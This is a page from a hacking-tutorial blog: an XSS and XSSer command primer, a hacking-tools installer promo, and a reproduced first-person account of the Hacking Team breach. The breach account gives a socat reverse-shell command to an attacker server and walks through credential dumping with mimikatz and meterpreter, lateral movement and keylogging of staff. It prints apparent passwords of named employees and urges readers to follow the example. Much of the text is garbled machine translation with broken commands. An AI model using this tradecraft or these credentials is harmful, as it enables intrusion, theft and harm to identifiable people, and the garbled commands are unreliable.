hackerbrother

Learn Penetration Testing And Ethical Hacking Online.

facebook

  • Facebook
  • Popular Posts

    xss sheet

    XSS attacks are talked about beyond the reflected and persistent types. It is intended to provide a broader vision of the possibilities within these types of attacks as well as the conditions for them to occur. It also explores and the operation of the XSSertool for launching attacks of this type.













    Introduction

    Cross Site Scripting (XSS)

    • XSS vulnerabilities encompassed any attack that allows executing scripting code in the context of another website. 
    • They can be found in any application whose final objective is to present the information in a web browser.
    • Usually, the input data that is used in some applications is not correctly validated, allowing a malicious script to be sent to the application.
    • To function they need an entry point, which is usually the forms. 
    • Through an XSS attack, you can hijack accounts, change user settings, access restricted parts of the site, modify site content, etc.

    Types of XSS attacks

    Direct Attacks
    • The direct attack of XSS (also called persistent XSS ), occurs when the attacker manages to embed malicious HTML code, directly on the websites that allow it.
    • It works by locating weaknesses in the programming of HTML filters, if they exist, to publish content.
    • This type of attack is usually the most common, and the code of the attacker is based on HTML tags (of the type or
    • The result shows a window with the text "hello-world".
    • This vulnerability is usually used to steal sessions and phishing.


    XSSer DESCRIPTION

    It is a framework that allows:
    • Detect vulnerabilities of type XSS
    • Explore these vulnerabilities locally or remotely.
    • Report in real time the vulnerabilities found.
    Among its main features include:
    • Graphic interface
    • Dorking
    • Support for GET and POST (this is important since in tools treated in previous articles only injections with GET could be performed).
    • Crawling
    • Proxy
    • Heuristic analysis
    • Preconfigured Exploits
    • Export options
    • Different bypassers to evade filters
    Types of injections allowed:
    • Classic XSS (code execution in an embedded script)
    • Cookie Injection
    • Cross Site “Agent” Scripting
    • Cross Site “Refer” Scripting
    • Injections in “Data Control Protocol” and “Document Objetct Model”
    • HTTP Response Splitting Induced


    EXAMPLES OF USE

    • Basic injection
    xsser -u “victima.com”
    • Automatic injection (test all vectors)
    xsser -u “victima.com” --auto
    • Injection with custom payload
    xsser -u “victima.com” --payload = ”> 
    • Local Exploitation
    xsser -u “victima.com” --Fp = “ 
    • Remote operation
    xsser -u “victima.com” --Fr = ” 
    • Dorking use
    xsser -d “inurl: admin / echo” --De “google” --Fp = ” 
    • Use of HTTP Refer proxy and header spoofin
    xsser -u “victima.com” --proxy http: // localhost: 8118 --refer “666.666.666.666”
    • Use of hexadecimal encoding

    xsser -u “victima.com” --Hex

    • Multiple injection with 5 wires and coding with mutation
    xsser -u “victima.com” --Cem --threads “5”
    • Use of crawler with depth 3 and 4 pages
    xsser -u “victima.com” -c3 --Cw = 4
    • Exploitation through POST
    xsser -u "victima.com" -p "target_host = name & dns-lookup-php-submit-button = Lookup + DNS"

    XSSER GTK

     It is a somewhat more intuitive option to use XSSer.



    The tool starts with:

    xsser --gtk
     
    Thanks to the use of the “Wizard Helper”, guided operation can be carried out much more easily than by command line

    TYPES OF XSS ATTACKS

    When talking about XSS, the two most basic types are usually in mind: reflected or persistent; 

    DOM XSS

    Take advantage of a modified active content to take control of a DOM, which allows you to control the flow of that object, but always through its API. 

    XSF

    It uses the Actionscript language used to program flash applications with the intention of loading unwanted elements on the page. 

    CSRF

    It is an exploitation option that uses a second web to launch the attack on the vulnerable web. 

    XFS

    Malicious code is injected into an iframe that will be injected hiddenly in the vulnerable web.

    XZS

    Achieve an escalation of zone privileges in IE due to a vulnerability. 

    XAS

    It allows to carry out the attack thanks to the modification of the value of “User-Agent” in the header of a web application. 

    XSSDoS

    Use a for-type instruction within a script embedded in the page to prevent users from accessing the content. 

    Flash! Attack

    Another Flash-based attack that uses Macromedia Flash Plugin and Active X Control to inject malicious codes. 

    Induced XSS

    Unlike the other XSS attacks, this attack is carried out on the server side. 

    Image Scripting

    It exploits the reading of the binary parameters of an image by a server that has not been adequately protected. 

    PostHeaderIcon XSSF - Cross Site Scripting Framework




    Continue Reading
    GitHackTools - The best Hacking and PenTesting tools installer on the world


    About GitHackTools: GitHackTools is a the best Hacking and PenTesting tools installer on the world. BruteDum can work with any Linux distros or Windows version if they support Python 3.



    Features of GitHackTools

    • Friend-ly Command Line Interface
    • A huge number os hacking tools
    • Support Windows and Linux, or orther OS. Better support on Debian or Arch Linux
    • Move to orther category with 1 command
    • ...

    GitHackTools installation on Linux
       You must install Python 3 and make first:

    • For Arch Linux and its distros: sudo pacman -S python3 make 
    • For Debian and its distros: sudo apt install python3 make 
         And then, open Terminal and enter this command:


    GitHackTools installation on Windows


    Download and runPython 3.7.x setup file from Python.org. On Install Python 3.7, enableAdd Python 3.7 to PATH 


    Download and runGit setup file  from Git-scm.com and chooseUse Git from Windows Command Propmt. 

       After that, openPowerShellorCommand Propmt and enter these commands:


     If you don't want to install Git, you can download githacktools-master.zip, extract and use it.

    GitHackTools screenshots
    GitHackTools
    GitHackTools Home page on Parrot Security OS
    GitHackTools Home page on Manjaro KDE
    GitHackTools Home page on Windows 10
    GitHackTools
    A2SV Installer on GitHackTools
    GitHackTools
    Metasploit Installer on GitHackTools


    Note: This tool may not install well with some tools on some Linux distros. Please tell me about your problems on Issues. Thanks!
    • Add more tools.
    • Add more features and commands.
    • More friend-ly.
    • Fix bugs if they are exist.
    • (Help me please)



    To-do list:
    Continue Reading
    Phineas Fisher explains how he hacked Hacking Team



    Hacking Team's leak was worldwide news, but nobody knew much about the author or how he did it. That mystery has finally been revealed. After eight months of almost complete silence, Phineas Fisher, the pseudonym behind the person who carried out the attack, has published a guide in Spanish DIY (Do It Yourself) with a detailed explanation of the tools and how he broke the security of the company's systems and uncovered its best kept secrets, as some of its clients in Spain: the CNI, the Civil Guard and the Police.





    Hacking Team was a company that helped governments to hack and spy on journalists, activists, political opponents, and other threats to their power And, very occasionally, to criminals and terrorists A Vincenzetti, the CEO, liked to finish his emails with the fascist slogan "boia chi molla". It would be more successful "boia chi sells RCS". They also claimed to have technology to solve the "problem" of Tor and the darknet



    Phineas Fisher snuck into the hacking team network silently and leaked more than 400 gigabytes of data, but it also serves as a manifesto of his political ideals and the motives behind access. 

    Before someone had to sneak into the offices to filter documents. A gun was needed to rob a bank. Today you can do it from the bed with a laptop in your hands As the CNT said after the hacking of the Gamma Group: "we will try to take a step forward with new forms of struggle". Hacking is a powerful tool, let's learn and fight! 

    At the end of the guide the author comments:

    And that's all it takes to end a business and end its human rights abuses
    With only 100 hours of work, a person can undo years of work from a multi-million dollar company. 

    In the guide, Phineas Fisher encourages others to follow his example


    Phineas Fisher argued that leaking documents to demonstrate corruption and abuse of power is really " ethical hacking ," instead of doing consulting work for companies that are often the ones that really deserve to be hacked. 

    Hacking Team is an Italian company that sells spyware and hacking services to police and intelligence services around the world. Over the years, researchers have documented several cases in which Hacking Team tools were used against journalists, dissidents, or activists. 

    On the night that the hacker published the data, he revealed himself to be the same person who in 2014 also hacked Gamma International, a competitor of a hacker team that sells spyware called FinFisher. 

     For months, however, a big question has gone unanswered: how the hacker managed to baffle and completely own a company whose business model depended exactly on hacking other people? 

    At that moment, the hacker promised that he would soon tell the world. I just wanted to wait a little while, he said on Twitter, until the Hacking team "had a little time to fail to figure out what happened and get out of business." 

    In his guide, published on Friday, the hacker explained how an unknown vulnerability is used ,or day zero (0day), to obtain the first point of support in the internal network of Hacking Team. Keeping in mind that the bug has not yet been patched, however, Phineas Fisher did not provide any details about what the vulnerability is exactly, or where it found it. 

    After entering, the hacker said he moved around carefully, first downloading emails, then accessing other servers and parts of the network. Having administrative privileges obtained within the company's main Windows network, Phineas Fisher said that spying on system administrators, especially Cristiana Pozzi, given that they generally have access to the entire network. After having stolen Pozzi's passwordsthe record of his keystrokes , the hacker said he accessed and exfiltrated all the source code of the company, which is housed in a separate isolated network. 

    At that point, the hacking Team Twitter password is reset with the "Forgot your password" function, and on July 5, it announced the hack using the company's own Twitter account.



    The hacker said that he was inside the Hacking Team network for six weeks, and that it took him about 100 hours of work to get around and get all the data. Judging by his words, it is clear Phineas Fisher had a strong political motivation for the Hacking Team's computer attack.

    I want to dedicate this guide for the victims of the assault to the school Armando DĂ­az, and all those who had the blood shed by the Italian fascists

    In reference to the bloody raid on the Italian school in Genoa in 2001, where police forces broke into a school where they lodged against the G-8 Genao Social Forum activists, resulting in the arrest of 93 activists. The methods of the raid and subsequent arrest, however, were so controversial that 125 policemen were brought to trial, accused of beating and torturing the detainees. 

    The hacker also rejected being defined as a vigilante, and opted for a more political definition.

    "I characterize myself as an anarchist revolutionary, not as a vigilante," he said in an email. "The vigilantes act outside the system, but intend to carry out the work of the judicial system, the police and none of which I am a fan of, I am clearly a criminal, it is not clear if hacking equipment has done anything illegal. If someone, the piracy of the team are the vigilantes, who acts on the margins in search of their love for authority and law and order. "

    Hacking allows the weakest gives the opportunity to fight and win

    Hacking is a powerful tool. Let's learn and fight!


    He wrote, citing the anarcho-syndicalist union National Labor Commission, or CNT. After Phineas Fisher hacked Grupo Gamma in 2014, the CNT said that clear technology was just another front in the class struggle, and that it was time to "take a step forward" with "new forms of struggle." 

    It is impossible to verify if all the details in the guide are true, since none of the hacking teams or the Italian authorities have made known everything related to the hack.

    "Any comments should come from the Italian law enforcement authorities who have been investigating the attack on the computer piracy, so there is no comment from the company," Hacking Team spokesman Eric Rabe said in an email. The Italian prosecutor's office could not be reached for comment. 

    It is not clear how the investigation is going, but Phineas Fisher does not seem too concerned about whether he will be caughtIn another section of his guide, he described Hacking Team as a company that helped governments spy on activists, journalists, political opponents, and "very occasionally" criminals and terrorists. The hacker also referred to the piracy claims of the team that was developing technology to track criminals using the Tor network and on the dark web. 

    "But considering that I'm still free," Snarkily wrote, "I have doubts about its effectiveness."



    Introduction


    It often comes out in the news that they have attributed an attack to a group of government hackers (the " APT s"), because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails etc). They are negligent because they can hack without legal consequences. 

    I did not want to make the work of the police easier and relate the Hacking Team with the hacks and nicknames of my daily work as a black glove hacker. So I used new servers and domains, registered with new emails and paid with new bitcoin addresses. In addition, I only used public tools and things that I wrote especially for this attack and changed my way of doing some things so as not to leave my normal forensic footprint.



    After the Gamma Group hack, I described a process to look for vulnerabilities. 

     Hacking Team has a public IP range: 
    inetnum: 93.62.139.32 - 93.62.139.47 
    descr: HT public subnet

    Hacking Team had very little exposed on the internet. For example, unlike Gamma Group, your customer service site needs a customer's certificate to connect. What he had was his main website (a Joomla blog where Joomscan does not reveal any serious flaws), a mail server, a couple of routers, two VPN devices, and a device to filter spam. Then I had three options:


    1. look for a 0day in Joomla, 
    2. look for a 0day in postfix, or
    3.  look for a 0day in one of the embedded systems. A 0day in an embedded system seemed to me the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Since the vulnerabilities have not yet been patched, I will not give more details. 


    There is a lot of work and testing before using the exploit against Hacking Team. 

    Wrote a firmware with backdoor, and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit. Using the exploit only once and then returning through the backdoor makes it more difficult to discover and patch the vulnerabilities.



    Tools used in the attack to Hacking Team


    The post-exploitation tools I had prepared were:

    • 1) busybox For all common UNIX utilities that the system does not have
    • 2) nmap To scan and fingerprint the internal Hacking Team network.
    • 3) Responder.py The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.
    • 4) Python To run Responder.py
    • 5) tcpdump To sniff traffic.
    • 6) dsniff To spy passwords of weak protocols like ftp, and to do
    • arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
    • 7) socat For a comfortable shell with pty: my_server: socat file: `tty`, raw, echo = 0 tcp-listen: my_port system hacked: socat exec: 'bash -li', pty, stderr, setsid, sigint, sane \ tcp: my_server: my_port And for many more things, it's a Swiss army knife. See the examples section of your documentation.
    • 8) screen As the pty of socat, it is not strictly necessary, but I wanted to feel at home in the Hacking Team networks.
    • 9) a SOCKS proxy server To use together with proxychains to access the internal network with any other program.
    • 10) tgcd To forward ports, like the SOCKS server, through the firewall.

    The worst that could happen was that my backdoor or post-exploitation tools left the system unstable and had an employee investigate it. Therefore, I spent a week testing my exploit, backdoor, and post-exploitation tools on the networks of other vulnerable companies before entering the Hacking Team network.

    NoSQL database


    NoSQL, or rather NoAutentication, has been a great gift to the hacker community. When I worry that they finally patched all the failures of omitting authentication in MySQL [2] [3] [4] [5], new databases become fashionable without authentication by design. Nmap finds a few on the 
    internal network of Hacking Team:

    27017 / tcp open mongodb MongoDB 2.6.5 
    mongodb-databases: 
    ok = 1 
    totalSizeMb = 47547 
    totalSize = 49856643072 
    ... 
    | _ version = 2.6.5 

    27017 / tcp open mongodb MongoDB 2.6.5 
    mongodb-databases: 
    ok = 1 
    totalSizeMb = 31987 
    totalSize = 33540800512 
    databases 
    ... 
    | _ version = 2.6.5

    Were the databases for RCS test instances. The audio recorded by RCS is saved in MongoDB with GridFS. The audio folder in the torrent [6] comes from this. They spied on themselves unintentionally. 

    Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened their doors . According to its documentation [1], its iSCSI devices must be in a separate network, but nmap finds ones in its subnet 192.168.1.200/24: 

    Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) 
    ... 
    3260 / tcp open iscsi? 
    iscsi-info: 
    Target: iqn.2000-01.com.synology: ht-synology.name 
    Address: 192.168.200.66:3260,0 
    | _ Authentication: No authentication required 

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) 
    ... 
    3260 / tcp open iscsi? 
    iscsi-info: 
    Target: iqn.2000-01.com.synology: synology-backup.name 
    Address: 10.0.1.72:3260,0 
    Address: 192.168.200.72:3260,0 
    | _ Authentication: No authentication required

    and we found backup copies of several virtual machines. The Exchange server seems the most interesting. It's too big to download, but we can mount it remotely and look for interesting files:

    $ losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk 
    $ fdisk -l / dev / loop0 
    / dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

    then the offset is 2048 * 512 = 1048576

    $ losetup -o 1048576 / dev / loop1 / dev / loop0 
    $ mount -o ro / dev / loop1 / mnt / exchange /

    now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 2014-10-14 172311 
    we find the hard disk of the virtual machine, and assemble it:

    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk / 
    mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

    ... and finally we have unpacked the Russian doll and we can see all the files of the old Exchange server in / mnt / part1

     What were the passwords of the Hacking Team administrators?

    What interests me most about the backup is to find out if you have a password or hash that you can use to access the current server. Use pwdump, cachedump, and lsadump [1] with the registry files. lsadump finds the password for the besadmin service account:

    _SC_BlackBerry MDS Connection Service 
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3.2.6.7.8. 
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

    I use proxychains [2] with the server socks in the embedded system and smbclient [3] to check the password:

    proxychins smbclient '//192.168.100.51/c$' -U 'hackingteam.local / besadmin% bes32678 !!!'

    !Works! The besadmin password is still valid, and it is a local administrator. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I already have many passwords, including the domain administrator's 

    password Hacking Team employees' passwords were:

    HACKINGTEAM BESAdmin bes32678 !!! 
    HACKINGTEAM Administrator uu8dd8ndd12! 
    HACKINGTEAM c.pozzi P4ssword 
    HACKINGTEAM m.romeo ioLK / (90 
    HACKINGTEAM l. War 4luc@=.= 
    HACKINGTEAM d.martinez W4tudul3sp 
    HACKINGTEAM g.russo GCBr0s0705! 
    HACKINGTEAM a.scarafile Cd4432996111 
    HACKINGTEAM r.viscardi Ht2015! 
    HACKINGTEAM a.mino A! e $$ andra 
    HACKINGTEAM m.bettini Ettore & Bella0314 
    HACKINGTEAM m.luppi Blackou7 
    HACKINGTEAM s.gallucci 1S9i8m4o! 
    HACKINGTEAM d.milan set! dob66 
    HACKINGTEAM w.furlan Blu3.B3rry! 
    HACKINGTEAM d.romualdi Rd13136f @ # 
    HACKINGTEAM l.invernizzi L0r3nz0123! 
    HACKINGTEAM e .ciceri 2O2571 & 2E
    HACKINGTEAM e.rabe erab @ 4HT!
    Powerful attention to Cristina Pozzi's password: P

    Introduction to Windows Domain Hacking

    I will give a brief review of the techniques to spread within a Windows network. The techniques to run remotely require the password or hash of a local administrator on the target. By far the most common way to get these credentials is to use mimikatz [1], especially sekurlsa :: logonpasswords and sekurlsa :: msv, on computers where you already have administrative access. Movement techniques "in situ" also require administrative privileges (except for runes). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3]. 

    Remote Motion: 

    1) psexec

    The basic and proven way of movement in windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from powershell empire [4], or the windows command "sc" [5]. For the module metasploit, powershell empire, and pth-winexe [6], just know the hash without knowing the password. It is the most universal way (it works on any computer with open port 445), but also the least cautious way. The type 7045 "Service Control Manager" will appear in the event log. In my experience, they have never noticed it during a hack, but sometimes they notice it later and it helps researchers understand what the hacker has done. 

    2) WMI

    The most cautious way. The WMI service is enabled on all windows computers, but except for servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here they have a demonstration of wmiexec and pth-wmis [8]), invoke_wmi of powershell empire [9], or the command of windows wmic [5]. All except wmic only need the hash. 

    3) PSRemoting [10] 

    It is disabled by default, and I do not advise you to enable new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes,
    you should use powershell for almost everything, it's going to change [11] with powershell 5 and windows 10, but nowadays powershell makes it easy to do everything in RAM, dodge antivirus, and leave few traces). 

    4) Scheduled tasks 

    Remote programs can be executed with at and schtasks [5]. It works in the same situations as psexec, and also leaves known traces [12]. 

    5) GPO

    If all these protocols are disabled or blocked by the firewall, once you are the administrator of the domain, you can use GPO to give a logon script, install a msi, execute a scheduled task [13], or as we will see with the Mauro Romeo's computer (sysadmin of Hacking 
    Team), enable WMI and open the firewall through GPO. 

    Movement "in situ":

    1) Impersonalizing Tokens 

    Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools to do this are incognito [1] and the token :: * commands of mimikatz [2]. 

    2) MS14-068 

    A validation failure in kerberos can be used to generate a domain administrator ticket [3] [4] [5]. 

    3) Pass the Hash 

    If you have your hash but the user does not have a session started, you can use sekurlsa :: pth [2] to get a ticket from the user. 

    4) Process Injection

    Any RAT can be injected into another process, for example the command migrate in meterpreter and pupy [6] or psinject [7] in powershell empire. You can inject to the process that has the token that you want. 

    5) runes 

    This is sometimes very useful because it does not require administrator privileges. The command is part of windows, but if you do not have a graphical interface you can use powershell [8].


    Persistence: maintain access


    Once you have access, you want to keep it. Actually, persistence is just a challenge for bastards like those of Hacking Team who want to hack activists or other individuals. To hack companies, you do not need persistence because companies never sleep. I always use "persistence" like duqu 2, run in RAM on a pair of servers with high percentages of uptime. In the hypothetical case that everyone restarts at the same time, I have passwords and a gold ticket [1] for reserve access. You can read more information about the persistence mechanisms for windows here [2] [3] [4]. But to hack companies, it is not necessary and the risk of detection increases.



    The best tool today to understand Windows networks is Powerview [1]. It is worth reading everything written by the author [2], first of all [3], [4], [5], and [6]. Powershell itself is also very powerful [7]. As there are still many servers 2003 and 2000 without powershell, you also have to learn the old school [8], with tools like netview.exe [9] or the windows command "net view". Other techniques that I like are: 

    1) Download a list of file names 

    With a domain administrator account, you can download all file names in the network with powerview:

    Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ | 
    select-string '^ (. *) \ t-' | % {dir -recurse $ _. Matches [0] .Groups [1] | 
    select fullname | out-file -append files.txt}

    Later, you can read it at your own pace and choose which ones you want to download. 

    2) Read emails 

    As we have seen, you can download emails with powershell, and they have a lot of useful information. 

    3) Read sharepoint 

    It is another place where many companies have important information. It can be downloaded with powershell [10]. 

    4) Active Directory [11] 

    It has a lot of useful information about users and computers. Without being a domain administrator, you can already find a lot of information with powerview and other tools [12]. After getting domain administrator you should export all AD information with csvde or another tool. 

    5) Spy on employees

    One of my favorite hobbies is hunting the sysadmins. Spying on Christan Pozzi (sysadmin of Hacking Team) I got access to the Nagios server that gave me access to the rete sviluppo (development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the entire domain.

    When I read the documentation of their infrastructure [1], I realized that I still lacked access to something important - the "Rete Sviluppo", an isolated network that stores all the source code of RCS. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian Pozzi to see how they manage the sviluppo network, and to see if there were other interesting systems that I should investigate. It was easy to access their computers since they were part of the Windows domain in which they had administrator. Mauro Romeo's computer had no open port, so I opened the WMI port [2] to run meterpreter [3]. In addition to recording keys and captures with Get-Keystrokes and Get-TimedScreenshot, I used many modules / gather / of metasploit, CredMan.ps1 [4], and searched for files [5]. When I saw that Pozzi had a Truecrypt volume, I waited until I had mounted it to copy the files then. Many have laughed at the weak passwords of Christian Pozzi (and Christian Pozzi in general, offers enough material for comedy [6] [7] [8] [9]). I included them in the filtration as an oversight and to laugh at him. The reality is that mimikatz and keyloggers see all the same passwords.

    Within the encrypted volume of Christian Pozzi, there was a textfile with many passwords [1]. One of them was for a Fully Automated Nagios server, which had access to the sviluppo network to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (it is an exploit not authenticated, but it is necessary for a user to have logged in for which I used the textfile password).

    Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had your windows password thanks to mimikatz. I tried it with the git server and it worked. I tried sudo and it worked. For the gitlab server and its twitter account, I used the function "forgot my password", and my access to the mail server to reset the password.

    Hacking guides usually end with a warning: this information is for educational purposes only, be an ethical hacker, not attack computers without permission, blablablá. I will say the same, but with a more rebellious concept of "ethical" hacking. It would be ethical hacking to filter documents, expropriate money to banks, and protect the computers of ordinary people. However, most people who call themselves "ethical hackers" work only to protect those who pay their consulting fee, which are often the ones that deserve the most hacking.

    In Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see Vincenzetti, his company, and his cronies from the police, police, and government, as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists. 
    Continue Reading